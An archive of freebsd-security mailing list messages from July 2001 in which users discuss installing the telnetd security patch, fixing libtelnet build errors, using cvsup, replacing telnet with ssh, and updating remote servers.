<005e01c1151d$d37f1340$1805010a@epconline.net> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org is your problem with the patch or the compile? i have 4.2 release and get the following make errors for make all after applying the patch. haven't figured this out yet... cc -O -pipe -DLINEMODE -DUSE_TERMIO -DDIAGNOSTICS -DOLD_ENVIRON -DENV_HACK -DAUTHENTICATION -DENCRYPTION -I/usr/src/secure/libexec/telnetd/../../../crypto/telnet -DINET6 -DNO_IDEA -o telnetd global.o slc.o state.o sys_term.o telnetd.o termstat.o utility.o authenc.o -lutil -ltermcap -L/usr/src/secure/libexec/telnetd/../../lib/libtelnet -ltelnet -lcrypto -lcrypt -lmp /usr/lib/libtelnet.a(kerberos.o): In function `kerberos4_init': kerberos.o(.text+0x114): undefined reference to `krb_get_default_keyfile' /usr/lib/libtelnet.a(kerberos.o): In function `kerberos4_send': kerberos.o(.text+0x1a6): undefined reference to `krb_get_phost' kerberos.o(.text+0x1e3): undefined reference to `krb_realmofhost' kerberos.o(.text+0x21a): undefined reference to `krb_mk_req' kerberos.o(.text+0x22b): undefined reference to `krb_err_txt' kerberos.o(.text+0x24d): undefined reference to `krb_get_cred' kerberos.o(.text+0x25e): undefined reference to `krb_err_txt' /usr/lib/libtelnet.a(kerberos.o): In function `kerberos4_is': kerberos.o(.text+0x456): undefined reference to `krb_get_lrealm' kerberos.o(.text+0x53c): undefined reference to `krb_rd_req' kerberos.o(.text+0x56c): undefined reference to `krb_err_txt' kerberos.o(.text+0x5a2): undefined reference to `krb_kntoln' kerberos.o(.text+0x5c1): undefined reference to `kuserok' /usr/lib/libtelnet.a(kerberos.o): In function `kerberos4_status': kerberos.o(.text+0x89e): undefined reference to `kuserok' *** Error code 1 Stop in /usr/src/secure/libexec/telnetd. -- thanks, just mike Upgrade n. A painful crisis which belatedly restores one's faith in the previous system. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 25 10:59:46 2001 Delivered-To: freebsd-security@freebsd.org Received: from kira.epconline.net (kira2.epconline.net [209.83.132.2]) by hub.freebsd.org (Postfix) with ESMTP id 0A0BA37B407 for ; Wed, 25 Jul 2001 10:59:36 -0700 (PDT) (envelope-from carock@epconline.net) Received: from therock (betterguard.epconline.net [207.206.185.193]) by kira.epconline.net (8.11.4/8.11.4) with SMTP id f6PHxZP58050 for ; Wed, 25 Jul 2001 12:59:35 -0500 (CDT) From: "Chuck Rock" To: Subject: RE: I'm having problems getting this patch installed.... Date: Wed, 25 Jul 2001 12:59:35 -0500 Message-ID: <006d01c11533$90452310$1805010a@epconline.net> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook 8.5, Build 4.71.2173.0 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 In-Reply-To: <3B5F0538.3BD89B86@uakron.edu> Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I haven't gotten that far. I'm on line 2 in the SA-01:49 "how to install this patch" procedure. It's asking me a question I don't know how to answer. On your problem, is that from the make depend, or make install? Chuck > -----Original Message----- > From: owner-freebsd-security@FreeBSD.ORG > [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Michael Dowdell > Sent: Wednesday, July 25, 2001 12:43 PM > To: security@FreeBSD.ORG > Subject: Re: I'm having problems getting this patch installed.... > > > is your problem with the patch or the compile? i have 4.2 release and > get the following make errors for make all after applying the patch. > haven't figured this out yet... > > > cc -O -pipe -DLINEMODE -DUSE_TERMIO -DDIAGNOSTICS -DOLD_ENVIRON > -DENV_HACK -DAUTHENTICATION -DENCRYPTION > -I/usr/src/secure/libexec/telnetd/../../../crypto/telnet -DINET6 > -DNO_IDEA -o telnetd global.o slc.o state.o sys_term.o telnetd.o > termstat.o utility.o authenc.o -lutil -ltermcap > -L/usr/src/secure/libexec/telnetd/../../lib/libtelnet -ltelnet -lcrypto > -lcrypt -lmp > /usr/lib/libtelnet.a(kerberos.o): In function `kerberos4_init': > kerberos.o(.text+0x114): undefined reference to > `krb_get_default_keyfile' > /usr/lib/libtelnet.a(kerberos.o): In function `kerberos4_send': > kerberos.o(.text+0x1a6): undefined reference to `krb_get_phost' > kerberos.o(.text+0x1e3): undefined reference to `krb_realmofhost' > kerberos.o(.text+0x21a): undefined reference to `krb_mk_req' > kerberos.o(.text+0x22b): undefined reference to `krb_err_txt' > kerberos.o(.text+0x24d): undefined reference to `krb_get_cred' > kerberos.o(.text+0x25e): undefined reference to `krb_err_txt' > /usr/lib/libtelnet.a(kerberos.o): In function `kerberos4_is': > kerberos.o(.text+0x456): undefined reference to `krb_get_lrealm' > kerberos.o(.text+0x53c): undefined reference to `krb_rd_req' > kerberos.o(.text+0x56c): undefined reference to `krb_err_txt' > kerberos.o(.text+0x5a2): undefined reference to `krb_kntoln' > kerberos.o(.text+0x5c1): undefined reference to `kuserok' > /usr/lib/libtelnet.a(kerberos.o): In function `kerberos4_status': > kerberos.o(.text+0x89e): undefined reference to `kuserok' > *** Error code 1 > > Stop in /usr/src/secure/libexec/telnetd. > > > -- > thanks, > > just mike > > Upgrade n. A painful crisis which belatedly restores one's faith > in the previous system. > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 25 11: 6:19 2001 Delivered-To: freebsd-security@freebsd.org Received: from pogo.caustic.org (pogo.caustic.org [208.44.193.69]) by hub.freebsd.org (Postfix) with ESMTP id 5E3F637B403 for ; Wed, 25 Jul 2001 11:06:09 -0700 (PDT) (envelope-from jan@caustic.org) Received: from localhost (jan@localhost) by pogo.caustic.org (8.11.0/ignatz) with ESMTP id f6PI5vp65855; Wed, 25 Jul 2001 11:05:57 -0700 (PDT) Date: Wed, 25 Jul 2001 11:05:57 -0700 (PDT) From: "f.johan.beisser" To: Robert Herrold Cc: freebsd-security@FreeBSD.ORG Subject: Re: telnet Exploit In-Reply-To: <033901c113aa$c65aebe0$6c01a8c0@mpcsecurity.com> Message-ID: X-Ignore: This statement isn't supposed to be read by you MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Mon, 23 Jul 2001, Robert Herrold wrote: > I have never used cvsup before, and I'm a little confused about the > current possible patch/fix. > > First off, is there a 'patch/fix/replacement for telnetd' > (/usr/libexec/telnetd). If so, would that be included in the cvsup? yes. > Secondly, I've read through the cvsup documentation, and I'm a little > unclear on whether it is basically just downloading source, or is it > adding the packages. (do I need to recompile?) it's downloading source. lots of it. this can take a while. yes, you'll have to recompile. > Any help would be greatly appreciated. hope this helps some. -------/ f. johan beisser /--------------------------------------+ http://caustic.org/~jan jan@caustic.org "if my thought-dreams could be seen.. "they'd probably put my head in a gillotine" -- Bob Dylan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 25 13:44:59 2001 Delivered-To: freebsd-security@freebsd.org Received: from uakron.edu (uakron.edu [130.101.5.4]) by hub.freebsd.org (Postfix) with ESMTP id D66BB37B405 for ; Wed, 25 Jul 2001 13:44:53 -0700 (PDT) (envelope-from dowdell@uakron.edu) Received: from uakron.edu ([130.101.90.200]) by uakron.edu (8.11.2/8.11.2) with ESMTP id f6PKiqh14367 for ; Wed, 25 Jul 2001 16:44:53 -0400 (EDT) Message-ID: <3B5F2FCF.304510D5@uakron.edu> Date: Wed, 25 Jul 2001 16:45:03 -0400 From: Michael Dowdell Organization: University of Akron X-Mailer: Mozilla 4.76 [en] (X11; U; Linux 2.2.12 i386) X-Accept-Language: en MIME-Version: 1.0 To: security@FreeBSD.ORG Subject: Re: I'm having problems getting this patch installed.... References: <006d01c11533$90452310$1805010a@epconline.net> Content-Type: multipart/mixed; boundary="------------85BE5A53EECC7C62E400EE8D" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This is a multi-part message in MIME format. --------------85BE5A53EECC7C62E400EE8D Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit i get these errors on 'make all'. applying the patch went smoothly. if i remember correctly, i had the same problem you seem to be having while applying a patch for ?file globbing with ftpd? and never did figure it out. after setting it aside for a bit and starting the whole process fresh, everything worked exactly as given. Chuck Rock wrote: > > I haven't gotten that far. I'm on line 2 in the SA-01:49 "how to install > this patch" procedure. > > It's asking me a question I don't know how to answer. > > On your problem, is that from the make depend, or make install? > > Chuck > > > -----Original Message----- > > From: owner-freebsd-security@FreeBSD.ORG > > [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Michael Dowdell > > Sent: Wednesday, July 25, 2001 12:43 PM > > To: security@FreeBSD.ORG > > Subject: Re: I'm having problems getting this patch installed.... > > > > > > is your problem with the patch or the compile? i have 4.2 release and > > get the following make errors for make all after applying the patch. > > haven't figured this out yet... > > > > > > cc -O -pipe -DLINEMODE -DUSE_TERMIO -DDIAGNOSTICS -DOLD_ENVIRON > > -DENV_HACK -DAUTHENTICATION -DENCRYPTION > > -I/usr/src/secure/libexec/telnetd/../../../crypto/telnet -DINET6 > > -DNO_IDEA -o telnetd global.o slc.o state.o sys_term.o telnetd.o > > termstat.o utility.o authenc.o -lutil -ltermcap > > -L/usr/src/secure/libexec/telnetd/../../lib/libtelnet -ltelnet -lcrypto > > -lcrypt -lmp > > /usr/lib/libtelnet.a(kerberos.o): In function `kerberos4_init': > > kerberos.o(.text+0x114): undefined reference to > > `krb_get_default_keyfile' > > /usr/lib/libtelnet.a(kerberos.o): In function `kerberos4_send': > > kerberos.o(.text+0x1a6): undefined reference to `krb_get_phost' > > kerberos.o(.text+0x1e3): undefined reference to `krb_realmofhost' > > kerberos.o(.text+0x21a): undefined reference to `krb_mk_req' > > kerberos.o(.text+0x22b): undefined reference to `krb_err_txt' > > kerberos.o(.text+0x24d): undefined reference to `krb_get_cred' > > kerberos.o(.text+0x25e): undefined reference to `krb_err_txt' > > /usr/lib/libtelnet.a(kerberos.o): In function `kerberos4_is': > > kerberos.o(.text+0x456): undefined reference to `krb_get_lrealm' > > kerberos.o(.text+0x53c): undefined reference to `krb_rd_req' > > kerberos.o(.text+0x56c): undefined reference to `krb_err_txt' > > kerberos.o(.text+0x5a2): undefined reference to `krb_kntoln' > > kerberos.o(.text+0x5c1): undefined reference to `kuserok' > > /usr/lib/libtelnet.a(kerberos.o): In function `kerberos4_status': > > kerberos.o(.text+0x89e): undefined reference to `kuserok' > > *** Error code 1 > > > > Stop in /usr/src/secure/libexec/telnetd. > > > > > > -- > > thanks, > > > > just mike > > > > Upgrade n. A painful crisis which belatedly restores one's faith > > in the previous system. > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- thanks, just mike Upgrade n. A painful crisis which belatedly restores one's faith in the previous system. --------------85BE5A53EECC7C62E400EE8D Content-Type: text/x-vcard; charset=us-ascii; name="dowdell.vcf" Content-Transfer-Encoding: 7bit Content-Description: Card for Michael Dowdell Content-Disposition: attachment; filename="dowdell.vcf" begin:vcard n:Dowdell;Michael tel;pager:330-560-3958 tel;home:330-535-7101 tel;work:330-972-8862 x-mozilla-html:TRUE url:http://gozips.uakron.edu/~dowdell org:University of Akron;Library Systems version:2.1 email;internet:dowdell@uakron.edu title:Systems/Network Analyst adr;quoted-printable:;;Bierce Library=0D=0A315 Buchtel Mall;Akron;OH;44325-1701;USA x-mozilla-cpt:;18272 fn:Mike Dowdell end:vcard --------------85BE5A53EECC7C62E400EE8D-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 25 13:57:12 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-64-169-104-149.dsl.lsan03.pacbell.net [64.169.104.149]) by hub.freebsd.org (Postfix) with ESMTP id 55A8A37B426 for ; Wed, 25 Jul 2001 13:56:33 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id DA06866E04; Wed, 25 Jul 2001 13:56:32 -0700 (PDT) Date: Wed, 25 Jul 2001 13:56:32 -0700 From: Kris Kennaway To: Michael Dowdell Cc: security@FreeBSD.ORG Subject: Re: I'm having problems getting this patch installed.... Message-ID: <20010725135632.C57915@xor.obsecurity.org> References: <005e01c1151d$d37f1340$1805010a@epconline.net> <3B5F0538.3BD89B86@uakron.edu> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="nmemrqcdn5VTmUEE" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <3B5F0538.3BD89B86@uakron.edu>; from dowdell@uakron.edu on Wed, Jul 25, 2001 at 01:43:20PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --nmemrqcdn5VTmUEE Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Wed, Jul 25, 2001 at 01:43:20PM -0400, Michael Dowdell wrote: > is your problem with the patch or the compile? i have 4.2 release and > get the following make errors for make all after applying the patch.=20 > haven't figured this out yet... Try rebuilding libtelnet first in secure/lib/libtelnet. Kris --nmemrqcdn5VTmUEE Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7XzJ/Wry0BWjoQKURAvIfAKDZ32Vg//R7ta/isEAIjopGszmkFgCdF5Q3 H+BH73XGoj/wGENi/smA2FM= =yCxO -----END PGP SIGNATURE----- --nmemrqcdn5VTmUEE-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 25 13:58:33 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-64-169-104-149.dsl.lsan03.pacbell.net [64.169.104.149]) by hub.freebsd.org (Postfix) with ESMTP id ED57437B401 for ; Wed, 25 Jul 2001 13:58:23 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id 31B7966E04; Wed, 25 Jul 2001 13:58:23 -0700 (PDT) Date: Wed, 25 Jul 2001 13:58:22 -0700 From: Kris Kennaway To: security@FreeBSD.org Subject: [venglin@freebsd.lublin.pl: Re: top format string bug exploit code (exploitable)] Message-ID: <20010725135822.D57915@xor.obsecurity.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="mJm6k4Vb/yFcL9ZU" Content-Disposition: inline User-Agent: Mutt/1.2.5i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --mJm6k4Vb/yFcL9ZU Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable To the person who asked about current exploitability of this. Kris ----- Forwarded message from Przemyslaw Frasunek ----- Delivered-To: kkenn@localhost.obsecurity.org Delivered-To: kris@freebsd.org Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm Precedence: bulk List-Id: List-Post: List-Help: List-Unsubscribe: List-Subscribe: Delivered-To: mailing list bugtraq@securityfocus.com Delivered-To: moderator for bugtraq@securityfocus.com From: "Przemyslaw Frasunek" To: "SeungHyun Seo" , Subject: Re: top format string bug exploit code (exploitable) Date: Wed, 25 Jul 2001 18:15:15 +0200 Organization: babcia padlina ltd. X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 X-UIDL: f70f3afb4816a63ef72be9f0b9bd764f > It still seems to be affected under 3.5beta9 (including this version) > someone said it's not the problem of exploitable vulnerability about 8 month ago , FreeBSD is not affected. Problem was fixed 9 months ago and advisory was issued. See: ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-00:62.top.v1.1. asc -- * Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE * * Inet: przemyslaw@frasunek.com ** PGP: D48684904685DF43EA93AFA13BE170BF * ----- End forwarded message ----- --mJm6k4Vb/yFcL9ZU Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7XzLtWry0BWjoQKURAuz5AJ9BLwLE+y6ZnX2p5VNrzqMZVNurPQCg+IfF H6wBP2WkoeTVcIKLKXnbUAY= =98ml -----END PGP SIGNATURE----- --mJm6k4Vb/yFcL9ZU-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 25 14: 4:38 2001 Delivered-To: freebsd-security@freebsd.org Received: from titan.titan-project.org (titan.titan-project.org [216.127.78.20]) by hub.freebsd.org (Postfix) with ESMTP id 7B1D137B406 for ; Wed, 25 Jul 2001 14:04:35 -0700 (PDT) (envelope-from cshumway@titan-project.org) Received: from localhost (cshumway@localhost [127.0.0.1]) by titan.titan-project.org (8.11.4/8.11.4) with ESMTP id f6PL3KQ76276; Wed, 25 Jul 2001 14:03:20 -0700 (PDT) (envelope-from cshumway@titan-project.org) Date: Wed, 25 Jul 2001 14:03:20 -0700 (PDT) From: Christopher Shumway To: Robert Herrold Cc: Subject: Re: telnet Exploit In-Reply-To: <033901c113aa$c65aebe0$6c01a8c0@mpcsecurity.com> Message-ID: <20010725135931.F75545-100000@titan.titan-project.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Mon, 23 Jul 2001, Robert Herrold wrote: > I have never used cvsup before, and I'm a little confused about the > current possible patch/fix. > > First off, is there a 'patch/fix/replacement for telnetd' > (/usr/libexec/telnetd). Yes. > If so, would that be included in the cvsup? As long as your CVSUping the soruce code distribution that contains telnetd's source code, then yes, your getting pretty much what the patch for telnetd contains. > Secondly, I've read through the cvsup documentation, and I'm a little > unclear on whether it is basically just downloading source, or is it > adding the packages. (do I need to recompile?) CVSUp updates your local source code repository with that on the CVSUp server you are using. It does not install binaries anywhere on the system. So, yes you will have to recompile telnetd after cvsuping. --- Christopher Shumway cshumway@titan-project.org cshumway@freebsd.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 25 14:29:56 2001 Delivered-To: freebsd-security@freebsd.org Received: from wasabi.sushigoth.com (dsl081-059-169.sfo1.dsl.speakeasy.net [64.81.59.169]) by hub.freebsd.org (Postfix) with ESMTP id 6380737B401 for ; Wed, 25 Jul 2001 14:29:54 -0700 (PDT) (envelope-from bob@antepenultimate.org) Received: from localhost (robert@localhost) by wasabi.sushigoth.com (8.11.1/8.11.1) with ESMTP id f6PLNZW05258 for ; Wed, 25 Jul 2001 14:23:35 -0700 (PDT) Date: Wed, 25 Jul 2001 14:23:35 -0700 (PDT) From: bob X-X-Sender: To: FreeBSD Security Subject: Telnet exploit & 3.4-RELEASE Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org What is the best way for me to secure my 3.4-Release machine from the recent telnetd exploit? I don't have physical acces to the machine (its on the other coast) and I don't have any of the cvsup packages installed. The packages and ports seem to be unavailable for this release. I'd like to just upgrade through source, but i'm not sure how to get the necessary packages. --bob To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 25 14:42:43 2001 Delivered-To: freebsd-security@freebsd.org Received: from fep04-svc.swip.net (fep04.swip.net [130.244.199.132]) by hub.freebsd.org (Postfix) with ESMTP id 7BD8C37B401 for ; Wed, 25 Jul 2001 14:42:39 -0700 (PDT) (envelope-from tubbs@home.se) Received: from tubbs.home.se ([213.100.32.142]) by fep04-svc.swip.net with ESMTP id <20010725214237.KBCH5761.fep04-svc.swip.net@tubbs.home.se>; Wed, 25 Jul 2001 23:42:37 +0200 Message-Id: <5.0.2.1.2.20010725234729.04b4b160@students.su.se> X-Sender: m74mh81f@students.su.se X-Mailer: QUALCOMM Windows Eudora Version 5.0.2 Date: Wed, 25 Jul 2001 23:47:52 -0700 To: bob , FreeBSD Security From: Markus =?iso-8859-1?Q?Hallstr=F6m?= Subject: Re: Telnet exploit & 3.4-RELEASE In-Reply-To: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 14:23 2001-07-25 -0700, bob wrote: >What is the best way for me to secure my 3.4-Release machine from the >recent telnetd exploit? > >I don't have physical acces to the machine (its on the other coast) and I >don't have any of the cvsup packages installed. The packages and ports >seem to be unavailable for this release. I'd like to just upgrade through >source, but i'm not sure how to get the necessary packages. > >--bob > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message Disable telnet in inetd and start using ssh would be a good workaround /TUBBS To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 25 15:10: 0 2001 Delivered-To: freebsd-security@freebsd.org Received: from wasabi.sushigoth.com (dsl081-059-169.sfo1.dsl.speakeasy.net [64.81.59.169]) by hub.freebsd.org (Postfix) with ESMTP id 7DA0C37B403 for ; Wed, 25 Jul 2001 15:09:58 -0700 (PDT) (envelope-from bob@antepenultimate.org) Received: from localhost (robert@localhost) by wasabi.sushigoth.com (8.11.1/8.11.1) with ESMTP id f6PM3bJ05306; Wed, 25 Jul 2001 15:03:37 -0700 (PDT) Date: Wed, 25 Jul 2001 15:03:37 -0700 (PDT) From: bob X-X-Sender: To: Markus =?iso-8859-1?Q?Hallstr=F6m?= Cc: bob , FreeBSD Security Subject: Re: Telnet exploit & 3.4-RELEASE In-Reply-To: <5.0.2.1.2.20010725234729.04b4b160@students.su.se> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=X-UNKNOWN Content-Transfer-Encoding: QUOTED-PRINTABLE Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Sorry, I should have mentioned that about a dozen of my friends use this machine for mail and such, so i need to provide telnet access for them. Many connect from machines where installing an ssh client isn't possible. --bob On Wed, 25 Jul 2001, Markus [iso-8859-1] Hallstr=F6m wrote: > At 14:23 2001-07-25 -0700, bob wrote: > >What is the best way for me to secure my 3.4-Release machine from the > >recent telnetd exploit? =2E.. > > Disable telnet in inetd and start using ssh would be a good workaround > > /TUBBS > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 25 15:53:46 2001 Delivered-To: freebsd-security@freebsd.org Received: from fep02-svc.swip.net (fep02.swip.net [130.244.199.130]) by hub.freebsd.org (Postfix) with ESMTP id 48E3037B407 for ; Wed, 25 Jul 2001 15:53:40 -0700 (PDT) (envelope-from tubbs@home.se) Received: from tubbs.home.se ([213.100.32.142]) by fep02-svc.swip.net with ESMTP id <20010725225338.KLZQ9787.fep02-svc.swip.net@tubbs.home.se>; Thu, 26 Jul 2001 00:53:38 +0200 Message-Id: <5.0.2.1.2.20010726002921.04d8cec0@students.su.se> X-Sender: m74mh81f@students.su.se X-Mailer: QUALCOMM Windows Eudora Version 5.0.2 Date: Thu, 26 Jul 2001 00:58:53 -0700 To: bob From: Markus =?iso-8859-1?Q?Hallstr=F6m?= Subject: Re: Telnet exploit & 3.4-RELEASE Cc: FreeBSD Security In-Reply-To: References: <5.0.2.1.2.20010725234729.04b4b160@students.su.se> Mime-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1"; format=flowed Content-Transfer-Encoding: quoted-printable Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 15:03 2001-07-25 -0700, bob wrote: >Sorry, I should have mentioned that about a dozen of my friends use this >machine for mail and such, so i need to provide telnet access for them. >Many connect from machines where installing an ssh client isn't possible. > >--bob > >On Wed, 25 Jul 2001, Markus [iso-8859-1] Hallstr=F6m wrote: > > > At 14:23 2001-07-25 -0700, bob wrote: > > >What is the best way for me to secure my 3.4-Release machine from the > > >recent telnetd exploit? >... > > > > Disable telnet in inetd and start using ssh would be a good workaround > > > > /TUBBS > > > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > get new friends! if that isnt an option i would check out some of the ssh=20 clients you can run on a website you could check http://www.appgate.org/products/mindterm/ and http://www.employees.org/~satch/ssh/faq/ssh-faq-2.html#ss2.2.2 I have no idea if any of these are any good you really shouldnt run telnet anyhow. /TUBBS To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 25 17:56:10 2001 Delivered-To: freebsd-security@freebsd.org Received: from smtp2.netc.pt (smtp2.netc.pt [212.18.160.142]) by hub.freebsd.org (Postfix) with ESMTP id 7A42C37B407 for ; Wed, 25 Jul 2001 17:56:07 -0700 (PDT) (envelope-from admin@pt-quorum.com) Received: from gateway.bogus (p082-237.netc.pt) by smtp2.netc.pt (Sun Internet Mail Server sims.3.5.1999.05.24.18.28.p7) with ESMTP id <0GH200HM52LGD3@smtp2.netc.pt>; Thu, 26 Jul 2001 01:56:06 +0100 (WET DST) Received: by gateway.bogus (Postfix, from userid 1001) id 6EEB27C80; Thu, 26 Jul 2001 01:57:30 +0100 (WEST) Date: Thu, 26 Jul 2001 01:57:30 +0100 From: Nuno Teixeira Subject: Updating security fixes without single user mode? To: freebsd-security@freebsd.org Message-id: <20010726015730.F5227@gateway.bogus> MIME-version: 1.0 Content-type: text/plain; charset=iso-8859-1 Content-disposition: inline Content-transfer-encoding: 8BIT User-Agent: Mutt/1.2.5i X-Operating-System: FreeBSD 4.3-STABLE Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hello to all, At my workstation I'm tracking STABLE with no problems. At my server I just want to update the system with security fixes, etc. My question is: Tracking RELEASE_4_3 (for a RELEASE 4.3 system) is a good option, but after makeworld and makekernel, I need to go into single user mode and make installworld and mergemaster. The problem is that my server is at US and I live in Portugal! So, it's impossible to run the system in single user mode. What is the best way of maintain the system updated without single user mode? Patches? Packages? Thanks in advance, -- -- Nuno Teixeira Dir. Técnico pt-quorum.com -- PGP Public Key: http://www.pt-quorum.com/pgp/nunoteixeira.asc Key fingerprint: 8C2C B364 D4DC 0C92 56F5 CE6F 8F07 720A 63A0 4FC7 -- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 25 18: 4:16 2001 Delivered-To: freebsd-security@freebsd.org Received: from fep01-svc.swip.net (fep01.swip.net [130.244.199.129]) by hub.freebsd.org (Postfix) with ESMTP id 18EA337B406 for ; Wed, 25 Jul 2001 18:04:11 -0700 (PDT) (envelope-from tubbs@home.se) Received: from tubbs.home.se ([213.100.32.142]) by fep01-svc.swip.net with ESMTP id <20010726010409.MLEL20404.fep01-svc.swip.net@tubbs.home.se>; Thu, 26 Jul 2001 03:04:09 +0200 Message-Id: <5.0.2.1.2.20010726030631.04de4ec0@students.su.se> X-Sender: m74mh81f@students.su.se X-Mailer: QUALCOMM Windows Eudora Version 5.0.2 Date: Thu, 26 Jul 2001 03:09:25 -0700 To: Nuno Teixeira , freebsd-security@FreeBSD.ORG From: Markus =?iso-8859-1?Q?Hallstr=F6m?= Subject: Re: Updating security fixes without single user mode? In-Reply-To: <20010726015730.F5227@gateway.bogus> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) 